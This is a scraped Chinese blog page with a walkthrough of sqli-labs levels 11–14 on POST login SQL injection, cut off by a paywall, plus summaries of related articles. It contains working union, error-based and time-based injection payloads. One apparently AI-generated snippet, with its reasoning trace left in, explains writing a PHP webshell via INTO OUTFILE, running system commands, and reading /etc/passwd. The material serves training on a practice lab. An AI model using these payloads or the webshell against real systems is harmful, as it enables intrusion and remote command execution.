sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解：联合注入、错误注入

原创

已于 2024-06-09 21:41:26 修改 · 872 阅读

10 ·

CC 4.0 BY-SA版权

文章标签：

#sql #web安全 #安全 #前端 #数据库 #计算机网络 #网络安全

于 2024-06-09 21:40:11 首次发布

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它，我们可以学习如何识别和利用不同类型的SQL注入漏洞，并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号：
login attempt
同时输入正确的用户名就可以查看到数据，那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名：

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名：

uname

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

超栈

关注关注

4
点赞
踩
10

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Sqli-labs靶场第11关详解[Sqli-labs-less-11]

m0_73615178的博客

02-24

1872

SQL注入的三个条件：①参数可控；（从参数输入就知道参数可控）②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断）③参数带入数据库执行。（从网页功能能大致分析出是否与数据库进行交互）利用 order by 来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-

【sqli-labs靶场】第11关

qq_61019688的博客

04-26

967

知道了sql语句，接下来就是构造sql语句来进行查询，例如1’ or 1=1#（注意此处不能再使用and来构造恒真语句，因为我们不知道username和password，所以要想判断sql语句是否执行要使用or，这样or后面的语句为true则执行，为false则报错）（还有一个注意点的此处不能再用--+来注释，要使用#）1’ order by 2#，无返回内容，由此可以判断出列数应该是2，对于为啥order by 2无内容返回因为是可能不存在username=1，所以查不到内容。1’ or 1=2#报错。

1 条评论您还未登录，请先登录后发表或查看评论

sqli-labs靶场11-17关（POST型）

bunengyongzho666的博客

05-05

980

uname=admin' and if((substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1)='s'),sleep(5),1)#爆字段。uname=admin&passwd=123' and updatexml(1,concat(0x7e,(database()),0x7e),1)#——爆数据库。

sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路

zyh1588的博客

11-06

768

小白回顾sqli-labs靶场第十一关

sqli-labs (less-11)

kukudeshuo的博客

03-09

3582

sqli-labs (less-11) 补充知识从第11关开始我们发现跟以前的页面已经完全不一样了，这里要我们输入用户名和密码假设我们现在注册了一个账号，账号为admin，密码为admin，我们登入进去看看登入进去之后我们发现屏幕上回显了我们输入的账号和密码，但是url那里却没有返回我们输入的账号和密码，因为前面的关卡我们输入的内容都是以GET方式传输到了服务端，而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求： GET方法用于获取请求页面的指定

sqli-labs(less-11)

m0_59092234的博客

07-31

190

先自我介绍一下，小编13年上师交大毕业，曾经在小公司待过，去过华为OPPO等大厂，18年进入阿里，直到现在。深知大多数初中级java工程师，想要升技能，往往是需要自己摸索成长或是报班学习，但对于培训机构动则近万元的学费，着实压力不小。自己不成体系的自学效率很低又漫长，而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家，初衷也很简单，就是希望帮助到想自学又不知道该从何学起的朋友，同时减轻大家的负担。添加下方名片，即可获取全套学习资料哦。...

sqli-labs 靶场 less-8、9、10 第八关到第十关详解：布尔注入，时间注入

Superstacks超全栈

06-09

1301

S接下来的工作就是之前使用的布尔注入流程一样，通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果，成功完成注入（有一说一，代码请求量一多这脚本运行时间真的长！但是你会发现，在获取用户密码的时候会有很多空字符，这里是什么原因呢？输入注入代码，通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息，也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行，当输入下列参数时可以看到页面需要。通过以上信息来看可以确定，这一关可以用。

sqli-labs 靶场 less-7 第七关详解：OUTFILE注入与配置

Superstacks超全栈

06-09

1474

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它，我们可以学习如何识别和利用不同类型的SQL注入漏洞，并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示，那我们只能使用布尔注入来测试了。只有列号为3的时候，才能正常显示，则字段长度为3。进入页面中，并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。

Sqli-labs靶场第9关详解[Sqli-labs-less-9]

m0_73615178的博客

02-24

2320

利用 order by 来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表，列做准备-database()SQL注入-时间型盲注（Time-based blind）

SQLI-labs-第十一关和第十二关

weixin_54055099的博客

04-28

1262

Sqli-labs的第11关和12关，有关POST方式的联合查询注入

Sqli-labs靶场第12关详解[Sqli-labs-less-12]

m0_73615178的博客

03-02

1067

所以，payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句，然后为了使where语句条件成立，加上一个or 1=1 ，-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求，所以先使用burp进行抓包，然后将数据包存入txt文件中打包用-r 选择目标txt文件。根据题目看，像一个登录页面，尝试使用布尔型盲注测试能否登录网站。输入：-admin") union select 1,2--爆出当前数据库名称及当前用户名。

sqli-labs的sql注入——基础挑战之less11

Eternity18的博客

11-27

831

sqli-labs学习，less11关SQL注入

sqli-labs-----第11关

wyzhxhn的博客

11-09

2421

基于错误的POST型单引号字符型注入

Sqli-Labs（第11关~第42关）通关笔记

weixin_54894046的博客

11-16

1342

sql注入lesson-11~31

SQL注入实例（sqli-labs/less-11）

Thewei666的博客

08-06

343

【代码】SQL注入实例（sqli-labs/less-11）

sqli-labs less-11

爱党人士

06-15

861

1-10就是get，这个是post，会post就肯定会get的啦。实验环境： firefox hackbar(这个是另一个版本，因为最多人用的那个版本要收费了） less 11: 随便输点东西 url栏没有什么变化，肯定是post，用hackbar。快速查看元素技巧： uname和passwd(这个在username右边的编辑框右键查看元素即可看到) 不出所料，下面就是要对其进行判...

【SQLi-LABS】Less -11 注入思路以及过程

m0_52513952的博客

02-22

3301

less 11 是 sqli-labs 的第一道 POST 型注入题，因此，我们不能再用之前 GET 型注入的方法，在搜索框进行注入，而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。

SQLi LABS Less-11 联合注入+报错注入_sqli-labs第11关

2401_86951418的博客

09-12

374

用户名输入：a’ union select 1,2 – a密码随便输入：1。

sqli-labs less-11 & less-12

water0diamond的博客

03-17

1052

POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的，而从现在开始我们进入post型关卡 post是一种数据提...

sqlilabs靶场Less-2如何写入webshell并执行系统命令

最新发布

07-08

<think>首先，用户的问题是："我想尝试在SQLi Labs靶场Less-2中通过SQL注入漏洞写入WebShell并执行系统命令"。这涉及到SQL注入漏洞利用，特别是写入WebShell到服务器上。关键点： - Sqli Labs Less-2：这是一个SQL注入练习环境，Less-2通常涉及基于整数的注入。 - 目标：写入WebShell并执行系统命令。从系统级指令： - 所有行内数学表达式必须用$...$，但这里可能不涉及数学表达式。 - 独立公式用$$...$$，但同样，可能不适用。 - LaTeX语法正确。 - 使用中文回答。 - 生成相关问题。 - 引用段落末尾添加引用标识。 - 回答结构清晰，逐步解决问题。 - 参考站内引用：用户提供了两个引用： - [^1]: 关于Mysql注入点写webshell的条件，secure_file_priv为空。 - [^2]: 关于MSSQL注入工具，但用户的问题是Mysql，因为Sqli Labs使用Mysql。用户的问题是基于Mysql的，因为Sqli Labs通常使用Mysql数据库。引用[^1]直接相关：它提到在Mysql注入中，如果secure_file_priv为空，可以写入webshell。步骤结构： 1. **理解漏洞**：解释Less-2的SQL注入类型。 2. **前提条件**：检查写入文件的权限，特别是secure_file_priv设置。 3. **写入WebShell**：如何通过SQL注入写入一个PHP文件到Web目录。 4. **执行系统命令**：通过访问webshell执行命令。 5. **注意事项**：安全风险和道德考虑（因为是练习环境）。 6. **生成相关问题**：在回答末尾。详细步骤： 1. **理解漏洞**： - Sqli Labs Less-2是一个基于整数的SQL注入漏洞。用户输入被直接用于SQL查询，没有过滤。 - 示例URL：`http://localhost/sqli-labs/Less-2/?id=1` - 注入点：id参数。 2. **前提条件**： - 写入文件需要： - MySQL用户有FILE权限。 - secure_file_priv系统变量为空或设置为允许写入的目录。默认情况下，它可能为空或限制。 - 知道Web服务器的根目录路径。 - 引用[^1]提到："secure_file_priv为空"是前提。 3. **写入WebShell**： - 使用`SELECT ... INTO OUTFILE`语句写入文件。 - Webshell内容：例如，一个简单的PHP文件：`<?php system($_GET['cmd']); ?>` - SQL注入payload：修改id参数来执行写入。 - 例如：`?id=-1' UNION SELECT 1,'<?php system($_GET["cmd"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php' -- -` - 但Less-2是基于整数的，所以不需要单引号。Payload应该适应整数注入。 - 正确payload：`?id=-1 UNION SELECT 1,'<?php system($_GET["cmd"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php' -- -` - 注意：路径需要正确。Web目录通常是`/var/www/html/`或类似。 4. **执行系统命令**： - 写入成功后，访问`http://localhost/sqli-labs/shell.php?cmd=ls`来执行命令。 - 例如，`cmd=ls`列出目录。 5. **注意事项**： - 在真实环境中，这是非法的；只在授权测试中使用。 - 确保环境允许写入：检查secure_file_priv。 - 如何检查：`SHOW VARIABLES LIKE 'secure_file_priv';` - 如果为空，则可以写入任何目录；如果为NULL，则不能写入。 - 权限：MySQL用户必须有FILE权限。 6. **生成相关问题**： - 基于主题，生成3-4个问题。 - 例如： 1. 如何检查MySQL的secure_file_priv设置？ 2. 什么是FILE权限，如何授予？ 3. 除了写入webshell，SQL注入还有哪些利用方式？ 4. 如何防止SQL注入漏洞？引用处理： - 在回答中，当提到写入文件条件时，引用[^1]。 - 例如："前提是secure_file_priv为空[^1]。" 回答结构： - 开头：简要介绍。 - 步骤分解。 - 代码示例（如果需要）。 - 结尾：相关问题。最终回答用中文。</think>### 在SQLi Labs Less-2中通过SQL注入写入WebShell并执行系统命令 SQLi Labs Less-2是一个基于整数的SQL注入漏洞练习环境，使用MySQL数据库。写入WebShell并执行系统命令需要满足特定前提条件，并利用SQL注入漏洞执行`INTO OUTFILE`语句。以下是详细步骤，确保操作仅在授权测试环境中进行（如Sqli Labs靶场），避免非法使用。 #### 前提条件 1. **MySQL用户权限**： - MySQL用户必须拥有`FILE`权限，允许读写服务器文件。 - 检查权限：通过SQL注入执行`SELECT user(), file_priv FROM mysql.user WHERE user = CURRENT_USER();`，如果`file_priv`值为`Y`，则有权写入。 2. **secure_file_priv设置**： - 该MySQL系统变量必须为空或设置为Web目录路径，否则无法写入文件。默认值可能为`NULL`（禁止写入）或空（允许任何目录写入）。 - 如何检查：通过注入执行`SHOW VARIABLES LIKE 'secure_file_priv';`。如果返回空值或特定路径，则可继续操作。前提是secure_file_priv为空[^1]。 3. **Web目录路径**： - 需要知道Web服务器的根目录（如Apache的`/var/www/html/`）。在Sqli Labs中，路径通常为`/var/www/html/sqli-labs/`或类似。可通过错误信息或枚举猜测（如`?id=1 AND 1=2 UNION SELECT 1,@@basedir,3`获取MySQL基础路径）。 #### 步骤详解：写入WebShell并执行命令 1. **确认注入点**： - Less-2是整数型注入，无需单引号。测试漏洞：`?id=1 AND 1=2`应返回空页面，证明可注入。 - 示例URL：`http://localhost/sqli-labs/Less-2/?id=1`。 2. **写入WebShell文件**： - 使用`UNION SELECT`结合`INTO OUTFILE`写入PHP WebShell文件。WebShell内容为一个简单的PHP脚本，例如：`<?php system($_GET['cmd']); ?>`，允许通过URL参数执行系统命令。 - **Payload示例**： ```sql ?id=-1 UNION SELECT 1,'<?php system($_GET["cmd"]); ?>',3 INTO OUTFILE '/var/www/html/sqli-labs/shell.php' -- - ``` - 解释： - `-1`：使原查询返回空，便于UNION注入。 - `UNION SELECT 1, ..., 3`：匹配原查询列数（Less-2通常为3列）。 - `INTO OUTFILE '/var/www/html/sqli-labs/shell.php'`：将输出写入指定文件。路径需替换为实际Web目录。 - `-- -`：注释后续SQL语句。 - 如果写入成功，浏览器可能返回空白页面或查询结果；失败则显示MySQL错误（如权限不足）。 3. **验证WebShell写入**： - 访问WebShell文件：`http://localhost/sqli-labs/shell.php`。如果文件存在，页面应无错误（可能显示空白）。 - 检查文件：在服务器终端执行`ls /var/www/html/sqli-labs/`，确认`shell.php`存在。 4. **执行系统命令**： - 通过WebShell执行命令：在URL中添加`cmd`参数，例如： - `http://localhost/sqli-labs/shell.php?cmd=ls`：列出当前目录文件。 - `http://localhost/sqli-labs/shell.php?cmd=whoami`：查看当前用户权限。 - 输出将直接显示在网页中。 #### 注意事项 - **权限问题**：如果写入失败，检查： - MySQL的`secure_file_priv`是否为空（使用`SHOW VARIABLES`确认）。 - Web目录是否可写（尝试写入其他文件测试）。 - MySQL用户是否有`FILE`权限（需数据库管理员配置）。 - **安全风险**：在真实环境中，此操作会危害系统安全，仅限授权测试。Sqli Labs靶场已设计为安全练习环境。 - **道德与法律**：确保操作符合道德规范，仅在本地或授权实验室进行。 #### 常见问题排查 - **写入失败（MySQL错误）**：如果报错`Can't create/write to file`，检查路径是否正确或权限不足。 - **WebShell无响应**：确认PHP解析正常（访问`.php`文件应执行，而非下载）。 - **路径枚举**：若未知Web目录，用注入枚举：`?id=1 AND 1=2 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3`（需权限）。